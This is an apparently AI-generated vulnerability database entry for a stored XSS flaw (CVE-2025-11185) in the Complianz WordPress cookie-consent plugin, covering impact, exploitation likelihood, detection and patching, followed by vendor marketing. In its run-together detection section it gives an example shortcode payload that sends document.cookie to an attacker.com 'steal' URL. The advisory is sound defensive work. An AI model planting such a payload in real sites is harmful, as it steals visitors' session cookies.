
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-11185 is a Stored Cross-Site Scripting (XSS) vulnerability in the Complianz – GDPR/CCPA Cookie Consent plugin for WordPress. It affects all versions up to and including 7.4.3, stemming from insufficient input sanitization and output escaping on user-supplied attributes in the cmplz-accept-link shortcode. The vulnerability was published on February 18, 2026, and carries a CVSS v3.1 base score of 6.4 (Medium) (Red Hat CVE, Wordfence).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation – Cross-Site Scripting). Authenticated attackers with contributor-level access or above can inject arbitrary JavaScript via malicious attributes passed to the cmplz-accept-link shortcode, which are then rendered unsanitized in page output. Because the scope is changed (S:C in CVSS), the injected script executes in the context of any user who visits the affected page, not just the attacker's session. No public proof-of-concept exploit code has been identified at this time (Red Hat CVE, Wordfence).
Successful exploitation allows an authenticated contributor-level attacker to persistently inject malicious scripts into WordPress pages, which execute in the browsers of all subsequent visitors. This can lead to session cookie theft, credential harvesting, defacement, or redirection of users to malicious sites. While availability is not directly impacted, confidentiality and integrity are both at risk for site visitors and potentially site administrators (Red Hat CVE, Sucuri).
No active in-the-wild exploitation has been reported, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is extremely low at 0.01%, indicating a low probability of near-term exploitation. Exploitation requires at minimum contributor-level authentication on the target WordPress site, which limits the attack surface compared to unauthenticated vulnerabilities (Red Hat CVE, Wordfence).
cmplz-accept-link shortcode with a malicious attribute, e.g., [cmplz-accept-link attribute=""><script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].wp-admin/post.php or REST API endpoints containing cmplz-accept-link shortcode with unusual or encoded attribute values; unexpected page edits by contributor-level accounts.<script> tags or encoded JavaScript within cmplz-accept-link shortcode attributes.Users should update the Complianz – GDPR/CCPA Cookie Consent plugin to version 7.4.4 or later, which addresses the insufficient sanitization and output escaping. As an interim measure, site administrators should restrict contributor-level user registrations and review existing contributor accounts for suspicious activity. Additionally, a Web Application Firewall (WAF) such as Wordfence can help detect and block XSS payloads targeting this shortcode (Wordfence, Sucuri).
Wordfence included CVE-2025-11185 in its weekly WordPress vulnerability report for the period of February 16–22, 2026, highlighting it as part of a broader set of plugin vulnerabilities tracked that week (Wordfence). Sucuri also referenced the vulnerability in its February 2026 patch roundup, recommending prompt updates for affected WordPress installations (Sucuri). No significant social media controversy or notable researcher commentary beyond standard disclosure coverage has been observed.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."